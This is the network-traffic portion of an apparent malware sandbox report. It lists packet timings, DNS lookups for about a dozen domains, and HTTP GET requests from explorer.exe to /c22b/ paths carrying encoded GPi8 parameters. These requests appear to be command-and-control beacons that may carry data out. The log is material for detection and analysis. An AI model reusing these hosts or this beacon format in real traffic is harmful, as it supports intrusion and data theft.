                                                                Apr 8, 2021 12:40:08.338521957 CEST8049733108.167.140.96192.168.2.5
                                                                Apr 8, 2021 12:40:08.338653088 CEST8049733108.167.140.96192.168.2.5
                                                                Apr 8, 2021 12:40:08.338666916 CEST4973380192.168.2.5108.167.140.96
                                                                Apr 8, 2021 12:40:08.338704109 CEST4973380192.168.2.5108.167.140.96
                                                                Apr 8, 2021 12:40:12.955671072 CEST4973680192.168.2.534.102.136.180
                                                                Apr 8, 2021 12:40:12.968401909 CEST804973634.102.136.180192.168.2.5
                                                                Apr 8, 2021 12:40:12.968549967 CEST4973680192.168.2.534.102.136.180
                                                                Apr 8, 2021 12:40:12.968741894 CEST4973680192.168.2.534.102.136.180
                                                                Apr 8, 2021 12:40:12.981177092 CEST804973634.102.136.180192.168.2.5
                                                                Apr 8, 2021 12:40:13.082386017 CEST804973634.102.136.180192.168.2.5
                                                                Apr 8, 2021 12:40:13.082421064 CEST804973634.102.136.180192.168.2.5
                                                                Apr 8, 2021 12:40:13.083111048 CEST4973680192.168.2.534.102.136.180
                                                                Apr 8, 2021 12:40:13.083240986 CEST4973680192.168.2.534.102.136.180
                                                                Apr 8, 2021 12:40:13.095765114 CEST804973634.102.136.180192.168.2.5
                                                                Apr 8, 2021 12:40:18.155721903 CEST4973780192.168.2.552.142.208.184
                                                                Apr 8, 2021 12:40:18.179723024 CEST804973752.142.208.184192.168.2.5
                                                                Apr 8, 2021 12:40:18.179909945 CEST4973780192.168.2.552.142.208.184
                                                                Apr 8, 2021 12:40:18.180222988 CEST4973780192.168.2.552.142.208.184
                                                                Apr 8, 2021 12:40:18.203510046 CEST804973752.142.208.184192.168.2.5
                                                                Apr 8, 2021 12:40:18.665832996 CEST4973780192.168.2.552.142.208.184
                                                                Apr 8, 2021 12:40:18.690045118 CEST804973752.142.208.184192.168.2.5
                                                                Apr 8, 2021 12:40:18.690273046 CEST4973780192.168.2.552.142.208.184
                                                                Apr 8, 2021 12:40:24.596085072 CEST4973880192.168.2.5104.21.85.234
                                                                Apr 8, 2021 12:40:24.613862038 CEST8049738104.21.85.234192.168.2.5
                                                                Apr 8, 2021 12:40:24.613954067 CEST4973880192.168.2.5104.21.85.234
                                                                Apr 8, 2021 12:40:24.619865894 CEST4973880192.168.2.5104.21.85.234
                                                                Apr 8, 2021 12:40:24.637587070 CEST8049738104.21.85.234192.168.2.5
                                                                Apr 8, 2021 12:40:24.656661034 CEST8049738104.21.85.234192.168.2.5
                                                                Apr 8, 2021 12:40:24.656760931 CEST8049738104.21.85.234192.168.2.5
                                                                Apr 8, 2021 12:40:24.656930923 CEST4973880192.168.2.5104.21.85.234
                                                                Apr 8, 2021 12:40:24.677726984 CEST4973880192.168.2.5104.21.85.234
                                                                Apr 8, 2021 12:40:24.695456028 CEST8049738104.21.85.234192.168.2.5
                                                                Apr 8, 2021 12:40:29.740457058 CEST4973980192.168.2.575.126.101.233
                                                                Apr 8, 2021 12:40:29.885278940 CEST804973975.126.101.233192.168.2.5
                                                                Apr 8, 2021 12:40:29.885428905 CEST4973980192.168.2.575.126.101.233
                                                                Apr 8, 2021 12:40:29.885621071 CEST4973980192.168.2.575.126.101.233
                                                                Apr 8, 2021 12:40:30.030329943 CEST804973975.126.101.233192.168.2.5
                                                                Apr 8, 2021 12:40:30.030370951 CEST804973975.126.101.233192.168.2.5
                                                                Apr 8, 2021 12:40:30.030384064 CEST804973975.126.101.233192.168.2.5
                                                                Apr 8, 2021 12:40:30.030628920 CEST4973980192.168.2.575.126.101.233
                                                                Apr 8, 2021 12:40:30.030708075 CEST4973980192.168.2.575.126.101.233
                                                                Apr 8, 2021 12:40:30.175600052 CEST804973975.126.101.233192.168.2.5
                                                                Apr 8, 2021 12:40:35.163100004 CEST4974080192.168.2.5199.59.242.153
                                                                Apr 8, 2021 12:40:35.273744106 CEST8049740199.59.242.153192.168.2.5
                                                                Apr 8, 2021 12:40:35.273957968 CEST4974080192.168.2.5199.59.242.153
                                                                Apr 8, 2021 12:40:35.274482965 CEST4974080192.168.2.5199.59.242.153
                                                                Apr 8, 2021 12:40:35.385809898 CEST8049740199.59.242.153192.168.2.5
                                                                Apr 8, 2021 12:40:35.386007071 CEST8049740199.59.242.153192.168.2.5
                                                                Apr 8, 2021 12:40:35.386203051 CEST8049740199.59.242.153192.168.2.5
                                                                Apr 8, 2021 12:40:35.386205912 CEST8049740199.59.242.153192.168.2.5
                                                                Apr 8, 2021 12:40:35.386214972 CEST8049740199.59.242.153192.168.2.5
                                                                Apr 8, 2021 12:40:35.386240959 CEST8049740199.59.242.153192.168.2.5
                                                                Apr 8, 2021 12:40:35.386388063 CEST4974080192.168.2.5199.59.242.153

                                                                UDP Packets

                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Apr 8, 2021 12:38:26.247538090 CEST6180553192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:38:26.260879993 CEST53618058.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:38:26.273617983 CEST5479553192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:38:26.285798073 CEST53547958.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:38:27.458818913 CEST4955753192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:38:27.472127914 CEST53495578.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:38:28.604650021 CEST6173353192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:38:28.617782116 CEST53617338.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:38:49.686887980 CEST6544753192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:38:49.699250937 CEST53654478.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:38:56.115886927 CEST5244153192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:38:56.134406090 CEST53524418.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:38:58.509546995 CEST6217653192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:38:58.521975994 CEST53621768.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:39:13.537167072 CEST5959653192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:39:13.549674988 CEST53595968.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:39:14.323939085 CEST6529653192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:39:14.336870909 CEST53652968.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:39:15.621750116 CEST6318353192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:39:15.634660959 CEST53631838.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:39:19.062145948 CEST6015153192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:39:19.080125093 CEST53601518.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:39:20.729530096 CEST5696953192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:39:20.742737055 CEST53569698.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:39:22.085884094 CEST5516153192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:39:22.098853111 CEST53551618.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:39:26.312537909 CEST5475753192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:39:26.325992107 CEST53547578.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:39:27.818598986 CEST4999253192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:39:27.830636978 CEST53499928.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:39:35.325081110 CEST6007553192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:39:35.342953920 CEST53600758.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:39:39.375530005 CEST5501653192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:39:39.407577038 CEST53550168.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:39:40.657305956 CEST6434553192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:39:40.784033060 CEST53643458.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:39:46.044650078 CEST5712853192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:39:46.079361916 CEST53571288.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:39:51.187709093 CEST5479153192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:39:51.221622944 CEST53547918.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:39:56.654994965 CEST5046353192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:39:56.925231934 CEST53504638.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:40:01.939572096 CEST5039453192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:40:01.988320112 CEST53503948.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:40:07.084477901 CEST5853053192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:40:07.238924980 CEST53585308.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:40:09.922626972 CEST5381353192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:40:09.938190937 CEST53538138.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:40:11.770804882 CEST6373253192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:40:11.785527945 CEST53637328.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:40:12.928857088 CEST5734453192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:40:12.952780008 CEST53573448.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:40:18.093121052 CEST5445053192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:40:18.154184103 CEST53544508.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:40:24.560899973 CEST5926153192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:40:24.595102072 CEST53592618.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:40:29.715652943 CEST5715153192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:40:29.739094973 CEST53571518.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:40:35.046875954 CEST5941353192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:40:35.161880970 CEST53594138.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:40:40.403029919 CEST6051653192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:40:40.748974085 CEST53605168.8.8.8192.168.2.5
                                                                Apr 8, 2021 12:40:46.672671080 CEST5164953192.168.2.58.8.8.8
                                                                Apr 8, 2021 12:40:47.159715891 CEST53516498.8.8.8192.168.2.5

                                                                DNS Queries

                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                Apr 8, 2021 12:39:40.657305956 CEST192.168.2.58.8.8.80xb1c4Standard query (0)www.abolishlawinforcement.comA (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:39:46.044650078 CEST192.168.2.58.8.8.80x2141Standard query (0)www.webinast.comA (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:39:51.187709093 CEST192.168.2.58.8.8.80x25baStandard query (0)www.puebloregentseniorliving.comA (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:39:56.654994965 CEST192.168.2.58.8.8.80xd7fdStandard query (0)www.anchor-little.comA (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:01.939572096 CEST192.168.2.58.8.8.80x4d33Standard query (0)www.brandschutzglas.comA (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:07.084477901 CEST192.168.2.58.8.8.80x5035Standard query (0)www.hispanicalinguablog.comA (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:12.928857088 CEST192.168.2.58.8.8.80xe779Standard query (0)www.unmanglement.comA (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:18.093121052 CEST192.168.2.58.8.8.80x9edbStandard query (0)www.plataformaporelmarcanario.comA (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:24.560899973 CEST192.168.2.58.8.8.80x8fdStandard query (0)www.dajiangzhibo12.comA (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:29.715652943 CEST192.168.2.58.8.8.80x99caStandard query (0)www.saturnkorp.netA (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:35.046875954 CEST192.168.2.58.8.8.80xfaf9Standard query (0)www.sgdivergence.comA (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:40.403029919 CEST192.168.2.58.8.8.80xb87Standard query (0)www.weatherdekniagara.comA (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:46.672671080 CEST192.168.2.58.8.8.80x9491Standard query (0)www.vtz6whu5254xb1.xyzA (IP address)IN (0x0001)

                                                                DNS Answers

                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                Apr 8, 2021 12:39:40.784033060 CEST8.8.8.8192.168.2.50xb1c4No error (0)www.abolishlawinforcement.com66.96.162.131A (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:39:46.079361916 CEST8.8.8.8192.168.2.50x2141No error (0)www.webinast.comwebinast.comCNAME (Canonical name)IN (0x0001)
                                                                Apr 8, 2021 12:39:46.079361916 CEST8.8.8.8192.168.2.50x2141No error (0)webinast.com35.214.93.182A (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:39:51.221622944 CEST8.8.8.8192.168.2.50x25baNo error (0)www.puebloregentseniorliving.compuebloregentseniorliving.comCNAME (Canonical name)IN (0x0001)
                                                                Apr 8, 2021 12:39:51.221622944 CEST8.8.8.8192.168.2.50x25baNo error (0)puebloregentseniorliving.com184.168.131.241A (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:39:56.925231934 CEST8.8.8.8192.168.2.50xd7fdName error (3)www.anchor-little.comnonenoneA (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:01.988320112 CEST8.8.8.8192.168.2.50x4d33No error (0)www.brandschutzglas.com81.19.159.73A (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:07.238924980 CEST8.8.8.8192.168.2.50x5035No error (0)www.hispanicalinguablog.comhispanicalinguablog.comCNAME (Canonical name)IN (0x0001)
                                                                Apr 8, 2021 12:40:07.238924980 CEST8.8.8.8192.168.2.50x5035No error (0)hispanicalinguablog.com108.167.140.96A (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:12.952780008 CEST8.8.8.8192.168.2.50xe779No error (0)www.unmanglement.comunmanglement.comCNAME (Canonical name)IN (0x0001)
                                                                Apr 8, 2021 12:40:12.952780008 CEST8.8.8.8192.168.2.50xe779No error (0)unmanglement.com34.102.136.180A (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:18.154184103 CEST8.8.8.8192.168.2.50x9edbNo error (0)www.plataformaporelmarcanario.com52.142.208.184A (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:24.595102072 CEST8.8.8.8192.168.2.50x8fdNo error (0)www.dajiangzhibo12.com104.21.85.234A (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:24.595102072 CEST8.8.8.8192.168.2.50x8fdNo error (0)www.dajiangzhibo12.com172.67.212.23A (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:29.739094973 CEST8.8.8.8192.168.2.50x99caNo error (0)www.saturnkorp.net75.126.101.233A (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:35.161880970 CEST8.8.8.8192.168.2.50xfaf9No error (0)www.sgdivergence.com199.59.242.153A (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:40.748974085 CEST8.8.8.8192.168.2.50xb87No error (0)www.weatherdekniagara.com154.90.117.58A (IP address)IN (0x0001)
                                                                Apr 8, 2021 12:40:47.159715891 CEST8.8.8.8192.168.2.50x9491No error (0)www.vtz6whu5254xb1.xyz49.156.179.238A (IP address)IN (0x0001)

                                                                HTTP Request Dependency Graph

                                                                • www.abolishlawinforcement.com
                                                                • www.webinast.com
                                                                • www.puebloregentseniorliving.com
                                                                • www.brandschutzglas.com
                                                                • www.hispanicalinguablog.com
                                                                • www.unmanglement.com
                                                                • www.plataformaporelmarcanario.com
                                                                • www.dajiangzhibo12.com
                                                                • www.saturnkorp.net
                                                                • www.sgdivergence.com

                                                                HTTP Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                0192.168.2.54972966.96.162.13180C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 8, 2021 12:39:40.904516935 CEST5495OUTGET /c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.abolishlawinforcement.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 8, 2021 12:39:41.035171032 CEST5498INHTTP/1.1 302 Found
                                                                Date: Thu, 08 Apr 2021 10:39:40 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Content-Length: 323
                                                                Connection: close
                                                                Server: Apache/2
                                                                Location: https://www.abolishlawinforcement.com/c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&ary=tXLpzhFpgBj4m
                                                                Cache-Control: max-age=3600
                                                                Expires: Thu, 08 Apr 2021 11:39:40 GMT
                                                                Accept-Ranges: bytes
                                                                Age: 0
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 62 6f 6c 69 73 68 6c 61 77 69 6e 66 6f 72 63 65 6d 65 6e 74 2e 63 6f 6d 2f 63 32 32 62 2f 3f 47 50 69 38 3d 31 64 51 61 61 44 74 4c 6f 34 68 49 6c 68 4a 37 44 68 4d 38 30 47 43 76 50 38 2f 49 38 43 58 31 39 44 30 2f 39 41 73 50 57 54 53 4d 35 41 34 59 31 33 38 64 4b 6a 4f 6c 41 4e 55 67 71 5a 36 32 35 41 37 63 26 61 6d 70 3b 61 72 79 3d 74 58 4c 70 7a 68 46 70 67 42 6a 34 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://www.abolishlawinforcement.com/c22b/?GPi8=1dQaaDtLo4hIlhJ7DhM80GCvP8/I8CX19D0/9AsPWTSM5A4Y138dKjOlANUgqZ625A7c&amp;ary=tXLpzhFpgBj4m">here</a>.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                1192.168.2.54973035.214.93.18280C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 8, 2021 12:39:46.122944117 CEST5504OUTGET /c22b/?GPi8=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fi0Jb7woXre&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.webinast.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 8, 2021 12:39:46.172902107 CEST5505INHTTP/1.1 301 Moved Permanently
                                                                Server: nginx
                                                                Date: Thu, 08 Apr 2021 10:39:46 GMT
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Content-Length: 334
                                                                Connection: close
                                                                Location: https://www.webinast.com/c22b/?GPi8=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fi0Jb7woXre&ary=tXLpzhFpgBj4m
                                                                Host-Header: 6b7412fb82ca5edfd0917e3957f05d89
                                                                X-Proxy-Cache: MISS
                                                                X-Proxy-Cache-Info: 0 NC:000000 UP:
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 77 65 62 69 6e 61 73 74 2e 63 6f 6d 2f 63 32 32 62 2f 3f 47 50 69 38 3d 31 57 59 46 50 43 46 41 61 2b 6a 70 48 49 42 39 42 6e 49 4c 55 34 43 30 36 71 71 35 70 47 68 76 4c 73 52 57 62 67 42 61 38 68 2f 64 6e 37 66 62 52 44 79 2b 41 39 66 58 31 46 69 30 4a 62 37 77 6f 58 72 65 26 61 6d 70 3b 61 72 79 3d 74 58 4c 70 7a 68 46 70 67 42 6a 34 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.webinast.com/c22b/?GPi8=1WYFPCFAa+jpHIB9BnILU4C06qq5pGhvLsRWbgBa8h/dn7fbRDy+A9fX1Fi0Jb7woXre&amp;ary=tXLpzhFpgBj4m">here</a>.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                2192.168.2.549731184.168.131.24180C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 8, 2021 12:39:51.402147055 CEST5506OUTGET /c22b/?GPi8=nmIfUlNr6AQSQgrNMPV2VDC5u2FNL4+2gZJ90khVvz7x9MdM6XesChhiT43O23KpZGxC&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.puebloregentseniorliving.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 8, 2021 12:39:51.606599092 CEST5506INHTTP/1.1 301 Moved Permanently
                                                                Server: nginx/1.16.1
                                                                Date: Thu, 08 Apr 2021 10:39:51 GMT
                                                                Content-Type: text/html; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Location: https://www.holidayseniorliving.com/senior-apartments/colorado/pueblo-regent?GPi8=nmIfUlNr6AQSQgrNMPV2VDC5u2FNL4+2gZJ90khVvz7x9MdM6XesChhiT43O23KpZGxC&ary=tXLpzhFpgBj4m
                                                                Data Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                3192.168.2.54973281.19.159.7380C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 8, 2021 12:40:02.025681973 CEST5507OUTGET /c22b/?GPi8=3e8gwkl9NTrwQEJIdtc/OIQW/HZWnYYyjZ9yyX4Ij6bEtyT7BmhmgR072GygdN+xOVfM&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.brandschutzglas.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 8, 2021 12:40:02.060216904 CEST5508INHTTP/1.1 301 Moved Permanently
                                                                Date: Thu, 08 Apr 2021 10:40:02 GMT
                                                                Server: Apache
                                                                Location: https://www.brandschutzglas.com/c22b/?GPi8=3e8gwkl9NTrwQEJIdtc/OIQW/HZWnYYyjZ9yyX4Ij6bEtyT7BmhmgR072GygdN+xOVfM&ary=tXLpzhFpgBj4m
                                                                Content-Length: 341
                                                                Connection: close
                                                                Content-Type: text/html; charset=iso-8859-1
                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 72 61 6e 64 73 63 68 75 74 7a 67 6c 61 73 2e 63 6f 6d 2f 63 32 32 62 2f 3f 47 50 69 38 3d 33 65 38 67 77 6b 6c 39 4e 54 72 77 51 45 4a 49 64 74 63 2f 4f 49 51 57 2f 48 5a 57 6e 59 59 79 6a 5a 39 79 79 58 34 49 6a 36 62 45 74 79 54 37 42 6d 68 6d 67 52 30 37 32 47 79 67 64 4e 2b 78 4f 56 66 4d 26 61 6d 70 3b 61 72 79 3d 74 58 4c 70 7a 68 46 70 67 42 6a 34 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.brandschutzglas.com/c22b/?GPi8=3e8gwkl9NTrwQEJIdtc/OIQW/HZWnYYyjZ9yyX4Ij6bEtyT7BmhmgR072GygdN+xOVfM&amp;ary=tXLpzhFpgBj4m">here</a>.</p></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                4192.168.2.549733108.167.140.9680C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 8, 2021 12:40:07.392082930 CEST5509OUTGET /c22b/?GPi8=HpleEjmznmAp1mnh3ErPpAEFAwO205ds9NqRbSfPQGhA2yUrvNOqRplXRPY5sqn9sB27&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.hispanicalinguablog.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 8, 2021 12:40:08.338521957 CEST5510INHTTP/1.1 301 Moved Permanently
                                                                Date: Thu, 08 Apr 2021 10:40:08 GMT
                                                                Server: nginx/1.19.5
                                                                Content-Type: text/html; charset=UTF-8
                                                                Content-Length: 0
                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                X-Redirect-By: WordPress
                                                                Location: http://hispanicalinguablog.com/c22b/?GPi8=HpleEjmznmAp1mnh3ErPpAEFAwO205ds9NqRbSfPQGhA2yUrvNOqRplXRPY5sqn9sB27&ary=tXLpzhFpgBj4m
                                                                X-Endurance-Cache-Level: 2
                                                                X-Server-Cache: true
                                                                X-Proxy-Cache: MISS


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                5192.168.2.54973634.102.136.18080C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 8, 2021 12:40:12.968741894 CEST5530OUTGET /c22b/?GPi8=SZiv1CvNDlpERXMbnn5ZLbcWCJQi367u53ErGxikwJhkUqcV+jft+FDyZI7mP4A7IH+s&ary=tXLpzhFpgBj4m HTTP/1.1
                                                                Host: www.unmanglement.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 8, 2021 12:40:13.082386017 CEST5530INHTTP/1.1 403 Forbidden
                                                                Server: openresty
                                                                Date: Thu, 08 Apr 2021 10:40:13 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 275
                                                                ETag: "6063a886-113"
                                                                Via: 1.1 google
                                                                Connection: close
